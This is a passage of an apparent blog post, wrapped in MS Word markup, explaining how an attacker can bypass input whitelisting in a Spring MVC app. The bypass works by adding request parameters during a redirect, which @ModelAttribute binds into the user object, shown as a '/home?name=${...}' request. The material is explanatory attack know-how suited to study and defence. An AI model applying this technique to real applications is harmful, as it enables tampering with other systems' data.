<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:8.0pt;
mso-para-margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-fareast-language:EN-US;}
</style>
<![endif]--></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">As we can
see, the controller gets User object from a user request, validates it, and if
the object is validated, the controller puts it in "DB".</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghDsRR5TW-LQZBMf9Saa38UGSLWBlLlmxlOj1TO5Uq3fLja_VNRpde3vRGEeCrIlooqOKwE2IZTfoaROnsEoVu83XVVCF52VFWQtW9elO1p_KfDMChkY5xDB7sIzC5VPJdJt6RhyphenhyphenxE1TsK/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghDsRR5TW-LQZBMf9Saa38UGSLWBlLlmxlOj1TO5Uq3fLja_VNRpde3vRGEeCrIlooqOKwE2IZTfoaROnsEoVu83XVVCF52VFWQtW9elO1p_KfDMChkY5xDB7sIzC5VPJdJt6RhyphenhyphenxE1TsK/s640/2.png" width="640" /></a></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">The
validating process is very strict. Because of whitelisting, we can use only figures
or symbols, but we need to put special symbols in the user object! How? There
is no way for the registration controller.</span></div>
<br />
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">So, what
can we do as attackers? Let's take a look at the authentication and home
controller.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Authentication
and home controller:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Authentication
method does pretty simple things: </span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">1) gets a
username and password from a request; </span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">2) gets a
user object from the db using the username and password;</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">3) puts the
user object in FlashAttribute and redirects to home method (sends redirect
response to "/home");</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">So, there
is no way to change the user object too.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsVZCeZZ7ikO-mpeQN_PwVpYGdeAHb_SIr9Mk-uzyL7sv68J6jRLZS1tUwIh9CI56q0w8Ih0q5yvFESNrlAXQvReA6h9VsjDDlHJl6Qlw_skQKsWiR5G6yfyURgsd3CSkjSgqEfZsXNuLS/s1600/3.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="372" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsVZCeZZ7ikO-mpeQN_PwVpYGdeAHb_SIr9Mk-uzyL7sv68J6jRLZS1tUwIh9CI56q0w8Ih0q5yvFESNrlAXQvReA6h9VsjDDlHJl6Qlw_skQKsWiR5G6yfyURgsd3CSkjSgqEfZsXNuLS/s640/3.png" width="640" /></a></div>
<br />
<br />
<div class="MsoNormal">
</div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"> What about
the home method?</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">
</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">It just
gets the user object from the flash attribute and shows it to us.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">@modelAttribute
is used in this case to get the user object, but it also can populate the user
object with incoming request params! So, we can change values in the user
object!</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">All we need
to do is to authenticate (send a request to the authenticate method) and add an
additional HTTP param during redirection.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">So, our
request will look like: </span></div>
<br />
<div class="MsoNormal">
<b><span lang="EN-US" style="mso-ansi-language: EN-US;">/home?name=${We_Can_Write_Here_wharever_we_want}</span></b><span lang="EN-US" style="mso-ansi-language: EN-US;"> </span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;">The goal is
achieved.</span></div>
<div class="MsoNormal">
<span lang="EN-US" style="mso-ansi-language: EN-US;"><!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>RU</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
